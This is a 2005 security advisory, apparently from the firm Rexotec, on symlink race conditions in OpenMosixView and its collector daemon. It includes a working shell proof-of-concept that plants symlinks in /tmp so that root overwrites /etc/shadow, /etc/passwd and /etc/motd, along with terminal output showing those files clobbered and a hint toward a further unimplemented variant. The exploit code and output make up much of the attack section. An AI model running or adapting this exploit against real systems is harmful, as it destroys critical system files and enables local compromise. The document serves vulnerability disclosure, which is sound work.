advRX250305.txt

` __________ __  
\______ \ ____ ___ ________/ |_ ____ ____  
| _// __ \\ \/ / _ \ __\/ __ \_/ ___\  
| | \ ___/ > < <_> ) | \ ___/\ \___   
| __|___/\___ >__/\__\____/|__| \_____>\___ >  
\_/ \/ _ research> \/   
.  
  
|############################ REXOTEC(dot)COM ##############################  
|  
|=------=[ ADV RX250305 - OpenMosixView : Multiple Race conditions ]------=|  
|  
|  
|=---[ - INFORMATION  
`---------------------------------------------------------------------|   
  
VulnDiscovery: 2004/12/21  
Release Date : 2005/03/25  
Author : Gangstuck and Psirac <[email protected]>  
  
Application : OpenMosixView  
Affected : All version (lastest is openmosixview-1.5)  
Platform : Linux  
Risk : Critical  
Severity : Allow local user to compromise filesystem.  
  
Vendor : http://www.openmosixview.com/  
Reference : http://www.rexotec.com/advisory/RX250305.html  
  
Status : Vendor has been notified (2005/02/17) and will try to   
fix the topics listed above for the next release of   
OMView. This may take some time because of general   
architecture changes for OpenMosix on 2.6. kernels.  
  
  
|=---[ - SUMMARY OVERVIEW  
`---------------------------------------------------------------------|   
  
OpenMosix is a Linux kernel extension for single-system image clustering   
which turns a network of ordinary computers into a supercomputer.  
  
OpenMosixView is an intuitive cluster-management GUI for openMosix cluster.   
  
It contains eight usefull applications for monitoring and administrating   
openMosix-cluster. In the package, OpenMosixCollector is the daemon   
which should/could be started on one cluster-member. It logs openmosix  
load of each node. These history log-files are analyzed by some   
openMosix Analyzer located in the pack to gives a non-stop overview   
of the load, memory and processes in a cluster.  
  
  
|=-+-[ - VULNERABILITIES OVERVIEW   
| `---------------------------------------------------------------------|   
|  
.--+-[ OpenMosixView ]  
|   
| When OpenMosixView is started, it get nodes's names (or by default   
| nodes's IP) with "mosctl whois id_node_number", and redirect output   
| in /tmp/nodes.tmp without checking if file already exist, ...  
|   
+--.  
|  
'--[ OpenMosixView->OpenmosixCollector ]  
  
At each start of the OpenMosixCollector daemon, load of each node is   
formatted to the directory /tmp/openmosixcollector where data are   
organised in several files.   
  
The startup schema is :  
  
[ file ] cluster  
[ file ] IDnode-n  
[ file ] IDnode-n  
[ file ] sync.count  
[ dir ] phist  
  
Permissions are correctly handled ..   
  
drwxr-xr-x 3 root root 1024 2004-12-23 18:54 openmosixcollector  
|  
`----- -rw-r--r-- 1 root root 42674 2004-12-21 22:20 1  
-rw-r--r-- 1 root root 42612 2004-12-21 22:20 11  
-rw-r--r-- 1 root root 41444 2004-12-21 22:20 2  
-rw-r--r-- 1 root root 42063 2004-12-21 22:20 22  
-rw-r--r-- 1 root root 41486 2004-12-21 22:20 cluster  
drwxr-xr-x 2 root root 24576 2004-12-21 22:20 phist  
-rw-r--r-- 1 root root 4 2004-12-21 22:20 sync.count  
  
  
but, creation of predictable files allow any local attacker to remove   
arbitrary files on the vulnerable filesystem via the famous symlink   
vulnerability. In this case, we just have to rebuild a fake directory   
tree.   
  
If openmosixcollector-daemon is already running there is also a way to   
corrupt the fs due to the creation of a predictable backup temporary   
directory each 12 hours (see exploit below for more details).   
  
  
|=---[ - EXPLOITATION  
`---------------------------------------------------------------------|   
  
$ ./RX_OMcollector_proof.sh  
...  
$ ls -l /tmp/nodes.tmp  
lrwxrwxrwx 1 gang gang 12 2005-02-21 23:18 /tmp/nodes.tmp -> /etc/shadow  
  
# openmosixview &  
openMosix is started!  
openMosix cluster contains 3 members.  
cluster config changed! redraw cluster now.  
  
$ cat /etc/shadow  
192.168.0.11  
  
# /etc/init.d/openmosixcollector start  
Initializing openMosix...  
openMosix configuration was successful :)  
  
# ls -l /tmp/openmosixcollector/  
rwxrwxrwx 1 user user 12 2004-12-21 23:19 cluster -> /etc/passwd  
drwxr-xr-x 2 root root 1024 2004-12-21 23:25 phist  
lrwxrwxrwx 1 user user 12 2004-12-21 23:19 sync.count -> /etc/motd  
# cat /etc/passwd  
21.12.2005-23.25.59 5 184 1757 13 3  
21.12.2005-23.26.10 5 184 1757 13 3  
# cat /etc/motd  
2  
  
  
|=---[ - EXPLOIT - Proof of concept  
`----------------------------------------------------------------------|  
  
  
---8<--------8<-------cut-here-------8<--------8<---  
  
#!/bin/sh  
#################################################################  
# RX_oMcollector_proof.sh  
# OpenMosixCollector exploit [25/03/2005]  
# by Gangstuck and Psirac <[email protected]>  
#################################################################  
  
# -- Choose target  
TARGET1="/etc/shadow" # OM view target  
TARGET2="/etc/passwd" # OM collector target 1  
TARGET3="/etc/motd" # OM collector target 2  
  
# -- OpenMosixCollector temporary directory (without final '/')  
OMCTDIR="/tmp/openmosixcollector"  
  
echo "--------------------------------------------------------"  
echo "- -= OpenMosixView and OpenMosixCollector =- -"  
echo "- Symlink Vulnerability PoC -"  
echo "- [versions 1.5 and minor] -"  
echo "--------------------------------------------------------"  
echo "- Gangstuck and Psirac -"  
echo "- <[email protected]> -"  
echo "--------------------------------------------------------"  
  
# -- OM View  
ln -sf $TARGET1 /tmp/nodes.tmp  
if [ $? ]; then  
echo "[+] OpenMosixView attack successfully launched."  
echo -e " - target is ${TARGET1}\n"  
else  
echo "[!] Failed to exploit OpenMosixView..."  
fi  
  
# -- OM Collector  
if [ -d "$OMCTDIR" ]; then  
echo -e "[!] Openmosix is already running.\n  
Anyway, there is a way to exploit this case but this is not   
implemented in this public exploit. OpenMosixcollector-daemon   
automatically restarts every 12 hours and saves the current   
history to a directory located in /tmp (glibc: P_tmpdir).  
  
This is done whith the utilisation of a predictable temporary  
dir name \"${OMCTDIR}_[date]\" where [date] format   
look like \"18.0.2005-0.0.48\". Have phun :P"  
exit 0  
fi  
  
echo -e "[-] OpenMosixCollector seems not to be started..."  
echo " - creating fake directory"  
mkdir $OMCTDIR  
if [ ! $? ]; then  
echo "[!] OpenMosixCollector attack failed !"  
exit 1  
fi  
echo " - creating symlink attack against "  
echo -e "\t> ${TARGET2}" && ln -sf $TARGET2 ${OMCTDIR}/cluster;   
echo -e "\t> ${TARGET3}" && ln -sf $TARGET3 ${OMCTDIR}/sync.count;   
  
echo "[+] OpenMosixCollector attack successfully launched."  
  
---8<--------8<-------cut-here-------8<---------8<---  
  
  
  
|=---[ - ABOUT  
`----------------------------------------------------------------------|  
  
Rexotec is a company specialized in the corporate network which offers  
to professionals several solutions based on free software. It offers   
services in the field of security such as penetration testing and tends  
to be active in software auditing.  
  
  
--   
cheers,  
gangstuck and psirac <[email protected]>   
  
`